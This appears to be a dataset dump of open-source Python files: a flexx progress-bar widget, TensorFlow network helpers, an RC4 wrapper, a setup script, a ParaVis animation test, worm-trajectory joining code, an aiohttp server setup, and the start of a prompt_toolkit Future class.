code stringlengths 3 1.05M | repo_name stringlengths 5 104 | path stringlengths 4 251 | language stringclasses 1 value | license stringclasses 15 values | size int64 3 1.05M |
|---|---|---|---|---|---|
""" ProgressBar
Example:
.. UIExample:: 100
from flexx import app, event, ui
class Example(ui.Widget):
def init(self):
with ui.HBox():
self.b1 = ui.Button(flex=0, text='Less')
self.b2 = ui.Button(flex=0, text='More')
self.prog = ui.ProgressBar(flex=1, value=0.1, text='{percent} done')
@event.reaction('b1.pointer_down', 'b2.pointer_down')
def _change_progress(self, *events):
for ev in events:
if ev.source is self.b1:
self.prog.set_value(self.prog.value - 0.1)
else:
self.prog.set_value(self.prog.value + 0.1)
"""
from ... import event
from .._widget import Widget, create_element
class ProgressBar(Widget):
    """ A widget to show progress.
    The ``node`` of this widget is a
    `<div> <https://developer.mozilla.org/docs/Web/HTML/Element/div>`_
    containing a few HTML elements for rendering.
    """

    # Minimum size (width, height) in pixels that the layout gives this widget.
    DEFAULT_MIN_SIZE = 40, 16

    CSS = """
    .flx-ProgressBar {
        border: 1px solid #ddd;
        border-radius: 6px;
        background: #eee;
    }
    .flx-ProgressBar > .progress-bar {
        /* Use flexbox to vertically align label text */
        display: -webkit-flex;
        display: -ms-flexbox;
        display: -ms-flex;
        display: -moz-flex;
        display: flex;
        -webkit-flex-flow: column;
        -ms-flex-flow: column;
        -moz-flex-flow: column;
        flex-flow: column;
        -webkit-justify-content: center;
        -ms-justify-content: center;
        -moz-justify-content: center;
        justify-content: center;
        white-space: nowrap;
        align-self: stretch;
        position: absolute; /* need this on Chrome when in a VBox */
        background: #8be;
        text-align: center;
        /*transition: width 0.2s ease;  behaves silly on Chrome */
    }
    """

    value = event.FloatProp(0, settable=True, doc="""
        The progress value.
        """)

    min = event.FloatProp(0, settable=True, doc="""
        The minimum progress value.
        """)

    max = event.FloatProp(1, settable=True, doc="""
        The maximum progress value.
        """)

    text = event.StringProp('', settable=True, doc="""
        The label to display on the progress bar. Occurances of
        "{percent}" are replaced with the current percentage, and
        "{value}" with the current value.
        """)

    @event.action
    def set_value(self, value):
        # Clamp the requested value to the [self.min, self.max] range before
        # mutating. Note: ``max``/``min`` on these two lines are the builtin
        # functions, not the props of the same name.
        value = max(self.min, value)
        value = min(self.max, value)
        self._mutate_value(value)

    @event.reaction('min', 'max')
    def __keep_value_constrained(self, *events):
        # Re-apply the clamping in set_value() whenever the bounds change.
        self.set_value(self.value)

    def _render_dom(self):
        # This method runs in the browser (transpiled by PScript);
        # ``global Math`` gives access to the JavaScript Math object.
        global Math
        value = self.value
        mi, ma = self.min, self.max
        perc = 100 * (value - mi) / (ma - mi)
        label = self.text
        label = label.replace('{value}', str(value))
        # ``number + str`` below is JS-style string concatenation (valid in
        # the transpiled code, not in plain Python).
        label = label.replace('{percent}', Math.round(perc) + '%')
        attr = {'style__width': perc+'%',
                'style__height': '100%',
                'className': 'progress-bar',
                }
        return [create_element('div', attr, label)]
| zoofIO/flexx | flexx/ui/widgets/_progressbar.py | Python | bsd-2-clause | 3,268 |
import tensorflow as tf
def weight_variable(shape):
    """Create a trainable weight tensor of the given shape, initialized
    from a truncated normal distribution with stddev 0.1."""
    return tf.Variable(tf.truncated_normal(shape, stddev=0.1))
def bias_variable(shape):
    """Create a trainable bias tensor of the given shape, initialized to
    the constant 0.1 (slightly positive to help ReLU units fire)."""
    return tf.Variable(tf.constant(0.1, shape=shape))
def conv2d(x, W, padding='SAME'):
    """2-D convolution of x with kernel W, stride 1 in every dimension."""
    unit_strides = [1, 1, 1, 1]
    return tf.nn.conv2d(x, W, strides=unit_strides, padding=padding)
def max_pool1d(x, poolsize=2):
    """Max-pool along the second axis only; window and stride are both
    ``poolsize`` so pooled regions do not overlap."""
    window = [1, poolsize, 1, 1]
    return tf.nn.max_pool(x, ksize=window, strides=window, padding='SAME')
def add_cnn_layer(input, n_inputs, n_outputs, kernel_size, padding='SAME'):
    """Append a convolution -> ReLU -> max-pool block to the graph.

    input -- 4-D input tensor
    n_inputs -- number of input channels
    n_outputs -- number of output channels (filters)
    kernel_size -- kernel extent along the first spatial axis (the second
                   spatial axis of the kernel is fixed to 1)
    padding -- conv padding scheme, 'SAME' or 'VALID'

    Returns (pooled activations, weight variable).
    """
    # Removed the commented-out dense-layer variant that predated this
    # convolutional implementation; it was dead code.
    W = weight_variable([kernel_size, 1, n_inputs, n_outputs])
    b = bias_variable([n_outputs])
    h_conv = tf.nn.relu(conv2d(input, W, padding=padding) + b)
    h_pool = max_pool1d(h_conv)
    return h_pool, W
def add_fully_connected_layer(_X, n_inputs, n_outputs, keep_prob):
    """Append a fully connected layer with ReLU activation followed by
    dropout. Returns (dropped-out activations, weight variable)."""
    W = weight_variable([n_inputs, n_outputs])
    b = bias_variable([n_outputs])
    # Hidden layer with RELU activation, then dropout regularization.
    activated = tf.nn.relu(tf.add(tf.matmul(_X, W), b))
    regularized = tf.nn.dropout(activated, keep_prob)
    return regularized, W
# this is my exemplary convolutional network
def cnn(_X, n_classes, keep_prob):
    """Example convolutional network: two conv/pool blocks, one
    dropout-regularized fully connected layer and a linear readout.

    _X -- 4-D input tensor
    n_classes -- number of output units (logits)
    keep_prob -- dropout keep probability for the fully connected layer
    Returns the un-normalized logits tensor.
    """
    # two convolutional layers
    layer_1, _ = add_cnn_layer(_X, 1, 32, 3, padding='VALID')
    layer_2, _ = add_cnn_layer(layer_1, 32, 32, 2, padding='VALID')
    # flatten last one to be able to apply it to fully connected layer
    # NOTE(review): 1*32 assumes the two VALID conv + pool stages reduce the
    # spatial extent to exactly 1 for the expected input size -- TODO confirm.
    final_number_of_dimensions = 1*32
    layer_2_flat = tf.reshape(layer_2, [-1, final_number_of_dimensions])
    # fully connected layer to bring information together
    fc_dim = 5
    h_fc1_drop, _ = add_fully_connected_layer(layer_2_flat,
                                              final_number_of_dimensions,
                                              fc_dim, keep_prob)
    # return linear output layer
    W_fc2 = weight_variable([fc_dim, n_classes])
    b_fc2 = bias_variable([n_classes])
    return tf.matmul(h_fc1_drop, W_fc2) + b_fc2
# and this is the simpler multilayer perceptron
def multilayer_perceptron(x, n_bands, n_hidden, n_classes, keep_prob):
    """Three-hidden-layer perceptron with dropout and a linear readout.

    x -- input tensor, flattened to (batch, n_bands)
    n_bands -- number of input features
    n_hidden -- width of each hidden layer
    n_classes -- number of output units
    keep_prob -- dropout keep probability

    Returns (logits, regularizers) where ``regularizers`` is the sum of the
    L2 losses of all weight matrices (to be added to the training loss).
    """
    flattend_input = tf.reshape(x, [-1, n_bands])
    layer_1, W_1 = add_fully_connected_layer(flattend_input, n_bands, n_hidden,
                                             keep_prob)
    layer_2, W_2 = add_fully_connected_layer(layer_1, n_hidden, n_hidden,
                                             keep_prob)
    last_hidden_layer, W_3 = add_fully_connected_layer(layer_2, n_hidden, n_hidden,
                                                       keep_prob)
    # Linear output layer (no activation; caller applies softmax/loss).
    W_out = weight_variable([n_hidden, n_classes])
    b_out = bias_variable([n_classes])
    regularizers = (tf.nn.l2_loss(W_1) + tf.nn.l2_loss(W_2) +
                    tf.nn.l2_loss(W_3) + tf.nn.l2_loss(W_out))
    return tf.matmul(last_hidden_layer, W_out) + b_out, regularizers
| iwegner/MITK | Modules/Biophotonics/python/iMC/regression/tensorflow_estimator.py | Python | bsd-3-clause | 3,199 |
# Author: Trevor Perrin
# See the LICENSE file for legal information regarding use of this file.
"""PyCrypto RC4 implementation."""
from .cryptomath import *
from .rc4 import *
if pycryptoLoaded:
    import Crypto.Cipher.ARC4

    def new(key):
        """Factory: return a PyCrypto-backed RC4 cipher for *key*."""
        return PyCrypto_RC4(key)

    class PyCrypto_RC4(RC4):
        """RC4 stream cipher implemented on top of Crypto.Cipher.ARC4."""

        def __init__(self, key):
            RC4.__init__(self, key, "pycrypto")
            # PyCrypto's ARC4 expects a str key; convert from the bytes-like
            # representation used elsewhere in tlslite.
            key = bytesToString(key)
            self.context = Crypto.Cipher.ARC4.new(key)

        def encrypt(self, plaintext):
            """Encrypt a bytes-like plaintext, returning bytes."""
            plaintext = bytesToString(plaintext)
            return stringToBytes(self.context.encrypt(plaintext))

        def decrypt(self, ciphertext):
            """Decrypt a bytes-like ciphertext, returning bytes.

            RC4 is symmetric, so this mirrors encrypt().
            """
            ciphertext = bytesToString(ciphertext)
            return stringToBytes(self.context.decrypt(ciphertext))
import os
from setuptools import find_packages, setup

# The long description is taken verbatim from the README.
with open(os.path.join(os.path.dirname(__file__), 'README.md')) as readme:
    README = readme.read()

# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))

install_requires = [
    'requests==2.8.1'
]

setup(
    name='linkedin-auth',
    version='0.1',
    packages=find_packages(),
    include_package_data=True,
    license='BSD License',  # example license
    # Fixed typo: "authentcation" -> "authentication".
    description='A simple Django app for linkedin authentication.',
    long_description=README,
    url='https://github.com/technoarch-softwares/linkedin-auth',
    author='Pankul Mittal',
    author_email='mittal.pankul@gmail.com',
    install_requires=install_requires,
    classifiers=[
        'Environment :: Web Environment',
        'Framework :: Django',
        'Framework :: Django :: 1.8',  # replace "X.Y" as appropriate
        'Intended Audience :: Developers',
        'License :: OSI Approved :: BSD License',  # example license
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        # Replace these appropriately if you are stuck on Python 2.
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 3',
        'Topic :: Internet :: WWW/HTTP',
        'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
    ],
    zip_safe=False,
)
| technoarch-softwares/linkedin-auth | setup.py | Python | bsd-2-clause | 1,410 |
# Copyright (C) 2010-2014 CEA/DEN, EDF R&D
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# See http://www.salome-platform.org/ or email : webmaster.salome@opencascade.com
#
#This case corresponds to: /visu/animation/D6 case
#%Create animation for Iso Surfaces for 'pression' field of the the given MED file and dumps picture files in JPEG format %
# NOTE: Python 2 script; the Salome/ParaVis wildcard imports below supply
# get_picture_dir, datadir, OpenDataFile, IsoSurfacesOnField, AnimateReader, etc.
import sys
import os
from paravistest import *
from presentations import *
from pvsimple import *
import pvserver as paravis
#import file
myParavis = paravis.myParavis
# Directory for saving snapshots
picturedir = get_picture_dir("Animation/D6")
theFileName = datadir + "TimeStamps.med"
print " --------------------------------- "
print "file ", theFileName
print " --------------------------------- "
# Load the MED file and grab the resulting pipeline source.
OpenDataFile(theFileName)
aProxy = GetActiveSource()
if aProxy is None:
    raise RuntimeError, "Error: can't import file."
else: print "OK"
print "Creating a Viewer.........................",
aView = GetRenderView()
reset_view(aView)
Render(aView)
if aView is None : print "Error"
else : print "OK"
# Iso Surfaces creation
prs= IsoSurfacesOnField(aProxy,EntityType.CELL,'pression', 2)
prs.Visibility=1
aView.ResetCamera()
print "Creating an Animation.....................",
my_format = "jpeg"
print "Current format to save snapshots: ",my_format
# Add path separator to the end of picture path if necessary
if not picturedir.endswith(os.sep):
    picturedir += os.sep
# Select only the current field:
aProxy.AllArrays = []
aProxy.UpdatePipeline()
aProxy.AllArrays = ['TS0/dom/ComSup0/pression@@][@@P0']
aProxy.UpdatePipeline()
# Animation creation and saving into set of files into picturedir
scene = AnimateReader(aProxy,aView,picturedir+"D6_dom."+my_format)
nb_frames = len(scene.TimeKeeper.TimestepValues)
# One snapshot file per timestep is expected; clean up on mismatch.
pics = os.listdir(picturedir)
if len(pics) != nb_frames:
    print "FAILED!!! Number of made pictures is equal to ", len(pics), " instead of ", nb_frames
    for pic in pics:
        os.remove(picturedir+pic)
# Prepare animation performance
scene.PlayMode = 1 # set RealTime mode for animation performance
# set period
scene.Duration = 30 # correspond to set the speed of animation in VISU
scene.GoToFirst()
print "Animation.................................",
scene.Play()
scene.GoToFirst()
| FedoraScientific/salome-paravis | test/VisuPrs/Animation/D6.py | Python | lgpl-2.1 | 2,961 |
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 2 16:33:34 2015
@author: ajaver
"""
import os
import numpy as np
import pandas as pd
import tables
from scipy.spatial.distance import cdist
from tierpsy.helper.misc import TimeCounter, print_flush, TABLE_FILTERS
def assignBlobTraj(trajectories_file, max_allowed_dist=20, area_ratio_lim=(0.5, 2)):
    """Read /plate_worms from an HDF5 trajectories file, link blobs between
    consecutive frames (see assignBlobTrajDF) and write the resulting
    trajectory indexes back into the 'worm_index_blob' column.

    trajectories_file -- path to a *_trajectories.hdf5/*_skeletons.hdf5 file
    max_allowed_dist -- maximum blob displacement (pixels) between frames
    area_ratio_lim -- (min, max) allowed area ratio between linked blobs
    """
    #loop, save data and display progress
    base_name = os.path.basename(trajectories_file).replace('_trajectories.hdf5', '').replace('_skeletons.hdf5', '')
    with pd.HDFStore(trajectories_file, 'r') as fid:
        plate_worms = fid['/plate_worms']
    traj_ind = assignBlobTrajDF(plate_worms, max_allowed_dist, area_ratio_lim, base_name=base_name)
    # assignBlobTrajDF returns None for an empty table; only write back when
    # there is something to write.
    if traj_ind is not None:
        with tables.File(trajectories_file, 'r+') as fid:
            tbl = fid.get_node('/', 'plate_worms')
            tbl.modify_column(column=traj_ind, colname='worm_index_blob')
    #print_flush(progress_time.get_str(frame))
def assignBlobTrajDF(traj_df, max_allowed_dist, area_ratio_lim, base_name=''):
    """Greedily link blobs frame-to-frame into trajectories.

    For each pair of consecutive frames, blobs are matched by nearest
    neighbour, gated by max_allowed_dist and by area_ratio_lim; ambiguous
    matches (splits/merges) are rejected and start new trajectories.

    traj_df -- DataFrame with columns 'frame_number', 'coord_x', 'coord_y',
               'area' (one row per detected blob)
    Returns an int array of trajectory indexes (1-based) aligned with
    traj_df's rows sorted by row label, or None if traj_df is empty.
    """
    def _get_cost_matrix(frame_data, frame_data_prev):
        # Pairwise distance between every previous-frame blob (rows) and
        # every current-frame blob (columns).
        coord = frame_data[['coord_x', 'coord_y']].values
        coord_prev = frame_data_prev[['coord_x', 'coord_y']].values
        costMatrix = cdist(coord_prev, coord) # calculate the cost matrix
        # assign a large value to non-valid combinations by area
        area = frame_data['area'].values
        area_prev = frame_data_prev['area'].values
        area_ratio = area_prev[:, None]/area[None,:]
        area_ratio[np.isnan(area_ratio)] = 1e20
        bad_ratio = (area_ratio<area_ratio_lim[0]) | \
                    (area_ratio>area_ratio_lim[1]) | \
                    np.isnan(costMatrix)
        costMatrix[bad_ratio] = 1e20
        return costMatrix

    def _get_prev_ind_match(costMatrix):
        def _label_bad_ind(indexes, dist, max_allowed_dist):
            #label as bad the pairs that have a distance larger than max_allowed_dist
            indexes[dist>max_allowed_dist] = -1
            #remove indexes that were assigned twice (either a merge or a split event)
            uind, counts = np.unique(indexes, return_counts=True)
            duplicated_ind = uind[counts>1]
            bad_ind = np.in1d(indexes, duplicated_ind)
            indexes[bad_ind] = -1
            return indexes
        #I get the corresponding index in the previous data_frame
        #I remove pairs located at positions larger than max_allowed_dist
        #And indexes that were assigned twice or more (split events)
        map_to_prev = np.argmin(costMatrix, axis=0) #must have dimensions of frame_data
        min_dist_pp = costMatrix[map_to_prev, np.arange(costMatrix.shape[1])]
        _label_bad_ind(map_to_prev, min_dist_pp, max_allowed_dist)
        #here i am looking at in the prev indexes that would have been
        #assigned twice or more to the next indexes (merge events)
        map_to_next = np.argmin(costMatrix, axis=1) #must have dimensions of frame_data_prev
        min_dist_pp = costMatrix[np.arange(costMatrix.shape[0]), map_to_next]
        _label_bad_ind(map_to_next, min_dist_pp, max_allowed_dist)
        bad_prev_ind = np.where(map_to_next==-1)[0] #technically either index too far away or duplicated
        possible_merges = np.in1d(map_to_prev, bad_prev_ind)
        map_to_prev[possible_merges] = -1
        return map_to_prev

    frame_data_prev = None
    tot_worms = 0  # highest trajectory index handed out so far
    all_indexes = []
    frames_grouped = traj_df.groupby('frame_number')
    #if isinstance(area_ratio_lim, (float, int)):
    #    area_ratio_lim = (1/area_ratio_lim, area_ratio_lim)
    progress_time = TimeCounter(base_name + ' Assigning trajectories.', len(frames_grouped))
    for frame, frame_data in frames_grouped:
        #what happens if the frames are not continous?
        if frame_data_prev is not None:
            _, prev_traj_ind = all_indexes[-1]
            costMatrix = _get_cost_matrix(frame_data, frame_data_prev)
            map_to_prev = _get_prev_ind_match(costMatrix)
            traj_indexes = np.zeros_like(map_to_prev)
            unmatched = map_to_prev == -1
            matched = ~unmatched
            #assign matched index from the previous indexes
            traj_indexes[matched] = prev_traj_ind[map_to_prev[matched]]
            # unmatched blobs start brand-new trajectories
            vv = np.arange(1, np.sum(unmatched) + 1) + tot_worms
            if vv.size > 0:
                tot_worms = vv[-1]
                traj_indexes[unmatched] = vv
        else:
            # initialize worm indexes
            traj_indexes = tot_worms + np.arange(1, len(frame_data) + 1)
            tot_worms = traj_indexes[-1]
        all_indexes.append((frame_data.index, traj_indexes))
        frame_data_prev = frame_data
        if frame % 500 == 0:
            # calculate the progress and put it in a string
            print_flush(progress_time.get_str(frame))
    if all_indexes:
        # concatenate per-frame results and re-sort into the original row order
        row_ind, traj_ind = map(np.concatenate, zip(*all_indexes))
        traj_ind = traj_ind[np.argsort(row_ind)]
        return traj_ind
def _validRowsByArea(plate_worms):
    """Return the row labels of plate_worms that most likely belong to the
    single tracked worm: blobs are filtered by median area (6 MADs around
    the per-frame maximum) and then chained frame-by-frame by proximity.
    """
    # here I am assuming that most of the time the largest area in the frame is a worm. Therefore a very large area is likely to be
    # noise
    groupsbyframe = plate_worms.groupby('frame_number')
    maxAreaPerFrame = groupsbyframe.agg({'area': 'max'})
    med_area = np.median(maxAreaPerFrame)
    mad_area = np.median(np.abs(maxAreaPerFrame - med_area))
    min_area = med_area - mad_area * 6
    max_area = med_area + mad_area * 6
    # keep only trajectories whose median area falls inside the band
    groupByIndex = plate_worms.groupby('worm_index_blob')
    median_area_by_index = groupByIndex.agg({'area': np.median})
    good = ((median_area_by_index > min_area) & (
        median_area_by_index < max_area)).values
    valid_ind = median_area_by_index[good].index
    plate_worms_f = plate_worms[plate_worms['worm_index_blob'].isin(valid_ind)]
    # median location, it is likely the worm spend more time here since the
    # stage movements tries to get it in the centre of the frame
    CMx_med = plate_worms_f['coord_x'].median()
    CMy_med = plate_worms_f['coord_y'].median()
    L_med = plate_worms_f['box_length'].median()
    # let's use a threshold of movement of at most a quarter of the worm size,
    # otherwise we discard frame.
    L_th = L_med / 4
    # now if there are still a lot of valid blobs we decide by choosing the
    # closest blob
    valid_rows = []
    tot_frames = plate_worms['frame_number'].max() + 1
    def get_valid_indexes(frame_number, prev_row):
        # Select one blob for this frame: the one closest to prev_row (or to
        # the global median position when there is no previous blob).
        # Returns the chosen row, or the int -1 when nothing is close enough.
        try:
            current_group_f = groupbyframe_f.get_group(frame_number)
        except KeyError:
            # there are not valid index in the current group
            prev_row = -1
            return prev_row
        # pick the closest blob if there are more than one blob to pick
        if not isinstance(prev_row, int):
            delX = current_group_f['coord_x'] - prev_row['coord_x']
            delY = current_group_f['coord_y'] - prev_row['coord_y']
        else:
            delX = current_group_f['coord_x'] - CMx_med
            delY = current_group_f['coord_y'] - CMy_med
        R = np.sqrt(delX * delX + delY * delY)
        good_ind = np.argmin(R)
        if R[good_ind] < L_th:
            prev_row = current_group_f.loc[good_ind]
            valid_rows.append(good_ind)
        else:
            prev_row = -1
        return prev_row
    # group by frame
    groupbyframe_f = plate_worms_f.groupby('frame_number')
    prev_row = -1
    first_frame = tot_frames
    for frame_number in range(tot_frames):
        prev_row = get_valid_indexes(frame_number, prev_row)
        if not isinstance(prev_row, int) and first_frame > frame_number:
            first_frame = frame_number
    # if the first_frame is larger than zero it means that it might have lost some data in from the begining
    # let's try to search again from opposite direction
    if frame_number > 0 and len(valid_rows) > 0:
        prev_row = plate_worms_f.loc[np.min(valid_rows)]
        for frame_number in range(frame_number, -1, -1):
            prev_row = get_valid_indexes(frame_number, prev_row)
    #valid_rows = list(set(valid_rows))
    return valid_rows
def correctSingleWormCase(trajectories_file):
    '''
    Single-worm (WT2) case: mark the blobs that belong to the tracked worm
    (as selected by _validRowsByArea) with worm_index_joined == 1 and every
    other blob with -1, rewriting the /plate_worms table in place.
    '''
    with pd.HDFStore(trajectories_file, 'r') as traj_fid:
        plate_worms = traj_fid['/plate_worms']
    # empty table, nothing to do here
    if len(plate_worms) == 0:
        return
    valid_rows = _validRowsByArea(plate_worms)
    # default every row to -1, then flag the selected rows as worm 1
    plate_worms['worm_index_joined'] = np.array(-1, dtype=np.int32)
    plate_worms.loc[valid_rows, 'worm_index_joined'] = 1
    # Rewrite the table: create a temporary node, then swap it in so the
    # column layout stays consistent.
    with tables.File(trajectories_file, "r+") as traj_fid:
        newT = traj_fid.create_table('/', 'plate_worms_t',
                                     obj=plate_worms.to_records(index=False),
                                     filters=TABLE_FILTERS)
        newT._v_attrs['has_finished'] = 2
        traj_fid.remove_node('/', 'plate_worms')
        newT.rename('plate_worms')
def joinGapsTrajectories(trajectories_file,
                         min_track_size=50,
                         max_time_gap=100,
                         area_ratio_lim=(0.67, 1.5)):
    """Join blob trajectories separated by small time gaps (see
    joinGapsTrajectoriesDF) and store the result in the
    'worm_index_joined' column of the /plate_worms table.
    """
    #% get the first and last rows for each trajectory. Pandas is easier to manipulate than tables.
    with pd.HDFStore(trajectories_file, 'r') as fid:
        df = fid['plate_worms'][['worm_index_blob', 'frame_number',
                                 'coord_x', 'coord_y', 'area', 'box_length']]
    worm_index_joined = joinGapsTrajectoriesDF(df,
                                               min_track_size=min_track_size,
                                               max_time_gap=max_time_gap,
                                               area_ratio_lim=area_ratio_lim
                                               )
    # update worm_index_joined field
    with tables.open_file(trajectories_file, mode='r+') as fid:
        plate_worms = fid.get_node('/plate_worms')
        # add the result the column worm_index_joined
        plate_worms.modify_column(
            colname='worm_index_joined',
            column=worm_index_joined)
        fid.flush()
def joinGapsTrajectoriesDF(plate_worms,
                           min_track_size=50,
                           max_time_gap=100,
                           area_ratio_lim=(0.67, 1.5),
                           worm_index_type='worm_index_blob'):
    '''
    Join trajectories whose end/start points are close in time and space.

    plate_worms -- DataFrame with at least the columns [worm_index_type,
                   'frame_number', 'coord_x', 'coord_y', 'area', 'box_length']
    area_ratio_lim -- allowed range between the area ratio of consecutive frames
    min_track_size -- minimum tracksize accepted
    max_time_gap -- time gap between joined trajectories

    Returns an int array aligned with plate_worms' rows: the joined
    trajectory index, or -1 for rows of tracks shorter than min_track_size.
    '''
    def _findNextTraj(df, area_ratio_lim, min_track_size, max_time_gap):
        # For each sufficiently long track, find the track most likely to
        # continue it after a short gap. Returns ({child: parent}, valid ids).
        df = df[[worm_index_type, 'frame_number',
                 'coord_x', 'coord_y', 'area', 'box_length']].dropna()
        # row label of the first/last frame and track length per trajectory.
        # 'idxmin'/'idxmax' + .loc replace the removed np.argmin-in-agg +
        # DataFrame.ix combination (both were label-based lookups).
        tracks_data = df[[worm_index_type, 'frame_number']]
        tracks_data = tracks_data.groupby(worm_index_type)
        tracks_data = tracks_data.aggregate(
            {'frame_number': ['idxmin', 'idxmax', 'count']})
        # filter data only to include trajectories larger than min_track_size
        tracks_data = tracks_data[
            tracks_data['frame_number']['count'] >= min_track_size]
        valid_indexes = tracks_data.index
        # first and last row of each trajectory, re-indexed by trajectory id
        first_rows = df.loc[tracks_data['frame_number']['idxmin'].values]
        last_rows = df.loc[tracks_data['frame_number']['idxmax'].values]
        first_rows.index = valid_indexes
        last_rows.index = valid_indexes
        # look for trajectories that could be joined within a small time gap
        join_frames = []
        for curr_index in valid_indexes:
            last_frame = last_rows['frame_number'][curr_index]
            # candidates must start after the current track ends, within
            # a time gap given by max_time_gap
            possible_rows = first_rows[
                (first_rows['frame_number'] > last_frame) &
                (first_rows['frame_number'] < last_frame + max_time_gap)]
            # the area change must be within area_ratio_lim; the last point
            # of the current track is used since it is the closest in time
            areaR = last_rows['area'][curr_index] / possible_rows['area']
            possible_rows = possible_rows[
                (areaR > area_ratio_lim[0]) & (areaR < area_ratio_lim[1])]
            # no valid rows left
            if len(possible_rows) == 0:
                continue
            # distance between the current track's end point and each
            # candidate's start point. BUGFIX: the y-term previously
            # subtracted coord_x instead of coord_y.
            R = np.sqrt(
                (possible_rows['coord_x'] - last_rows['coord_x'][curr_index]) ** 2 +
                (possible_rows['coord_y'] - last_rows['coord_y'][curr_index]) ** 2)
            best_match = R.idxmin()
            # only join trajectories that move at most one worm body
            if R[best_match] <= last_rows['box_length'][curr_index]:
                join_frames.append((best_match, curr_index))
        return dict(join_frames), valid_indexes

    def _joinDict2Index(worm_index, relations_dict, valid_indexes):
        # Replace every trajectory id by the root of its chain in
        # relations_dict; rows of invalid (short) tracks keep -1.
        worm_index_new = np.full_like(worm_index, -1)
        for ind in valid_indexes:
            # search the dictionary for the first index in the joined group
            ind_joined = ind
            while ind_joined in relations_dict:
                ind_joined = relations_dict[ind_joined]
            # replace the previous index with the root index
            worm_index_new[worm_index == ind] = ind_joined
        return worm_index_new

    relations_dict, valid_indexes = _findNextTraj(
        plate_worms, area_ratio_lim, min_track_size, max_time_gap)
    # map each row's original index to its joined index, preserving row order
    worm_index_blob = plate_worms[worm_index_type].values
    worm_index_joined = _joinDict2Index(worm_index_blob, relations_dict, valid_indexes)
    return worm_index_joined
def joinBlobsTrajectories(trajectories_file,
                          analysis_type,
                          max_allowed_dist,
                          area_ratio_lim,
                          min_track_size,
                          max_time_gap):
    """Full trajectory-joining step: assign frame-to-frame blob indexes,
    then either keep the single tracked worm (analysis_type 'WT2') or join
    trajectory fragments across small time gaps, and finally flag the
    /plate_worms table as finished (has_finished = 2).
    """
    #allow to receive int/float values
    if not isinstance(area_ratio_lim, (tuple,list)):
        area_ratio_lim = (1/area_ratio_lim, area_ratio_lim)
    assignBlobTraj(trajectories_file, max_allowed_dist, area_ratio_lim)
    if analysis_type == 'WT2':
        correctSingleWormCase(trajectories_file)
    else:
        joinGapsTrajectories(trajectories_file, min_track_size, max_time_gap, area_ratio_lim)
    with tables.File(trajectories_file, "r+") as traj_fid:
        traj_fid.get_node('/plate_worms')._v_attrs['has_finished'] = 2
        traj_fid.flush()
from sklearn2sql_heroku.tests.regression import generic as reg_gen
# Generate/exercise the SQL code for an SGDRegressor on the freidman2
# dataset, targeting the hive dialect.
reg_gen.test_model("SGDRegressor" , "freidman2" , "hive")
| antoinecarme/sklearn2sql_heroku | tests/regression/freidman2/ws_freidman2_SGDRegressor_hive_code_gen.py | Python | bsd-3-clause | 127 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2016-05-05 14:32:46
# @Author : moling (365024424@qq.com)
# @Link : #
# @Version : 0.1
import logging
import os
from aiohttp import web
from jinja2 import Environment, FileSystemLoader
from config import COOKIE_NAME, COOKIE_KEY
from app.frame import add_routes, add_static
from app.frame.orm import create_pool
from app.factories import logger_factory, auth_factory, data_factory, response_factory
from app.filters import datetime_filter, marked_filter
logging.basicConfig(level=logging.INFO)
# jinja2初始化函数
def init_jinja2(app, **kw):
    """Create the jinja2 Environment and store it on app['__templating__'].

    Recognized keyword arguments: the template delimiters, ``autoescape``,
    ``auto_reload``, ``path`` (template directory, defaults to the package's
    ``templates`` folder) and ``filters`` (mapping of name -> callable).
    """
    logging.info('init jinja2...')
    option_defaults = (
        ('autoescape', True),
        ('block_start_string', '{%'),
        ('block_end_string', '%}'),
        ('variable_start_string', '{{'),
        ('variable_end_string', '}}'),
        ('auto_reload', True),
    )
    options = {name: kw.get(name, default) for name, default in option_defaults}
    path = kw.get('path', os.path.join(__path__[0], 'templates'))
    logging.info('set jinja2 template path: %s' % path)
    env = Environment(loader=FileSystemLoader(path), **options)
    filters = kw.get('filters')
    if filters is not None:
        for filter_name in filters:
            env.filters[filter_name] = filters[filter_name]
    app['__templating__'] = env
async def create_server(loop, config_mod_name):
    """Build and start the aiohttp application.

    loop -- the asyncio event loop to run on
    config_mod_name -- name of the module providing db_config/jinja2_config
    Raises ImportError when the config module cannot be imported.
    Returns the created server listening on 127.0.0.1:9900.
    """
    try:
        config = __import__(config_mod_name, fromlist=['get config'])
    except ImportError as e:
        raise e
    # database pool must exist before any handler runs
    await create_pool(loop, **config.db_config)
    app = web.Application(loop=loop, middlewares=[
        logger_factory, auth_factory, data_factory, response_factory])
    # register handlers from the route/api modules plus the static files
    add_routes(app, 'app.route')
    add_routes(app, 'app.api')
    add_routes(app, 'app.api_v2')
    add_static(app)
    init_jinja2(app, filters=dict(datetime=datetime_filter, marked=marked_filter), **config.jinja2_config)
    server = await loop.create_server(app.make_handler(), '127.0.0.1', 9900)
    logging.info('server started at http://127.0.0.1:9900...')
    return server
| moling3650/mblog | www/app/__init__.py | Python | mit | 2,122 |
"""
Future implementation for the prompt_toolkit eventloop.
"""
from __future__ import unicode_literals, print_function
from .base import EventLoop
from .context import get_context_id, context
from .defaults import get_event_loop
import sys
__all__ = [
'Future',
'InvalidStateError',
]
class InvalidStateError(Exception):
    """Raised when an operation is not allowed in the Future's current state."""
class Future(object):
    """
    `Future` object for use with the prompt_toolkit event loops.  (Not by
    accident very similar to asyncio -- but much more limited in functionality.
    They are however not meant to be used interchangeable.)
    """
    def __init__(self, loop=None):
        assert loop is None or isinstance(loop, EventLoop)
        self.loop = loop or get_event_loop()
        self.done_callbacks = []
        self._result = None
        self._exception = None
        self._done = False
        # Becomes True once the result/exception has been handed to a
        # callback or read via result()/exception(); __del__ uses it to
        # report exceptions that were never retrieved.
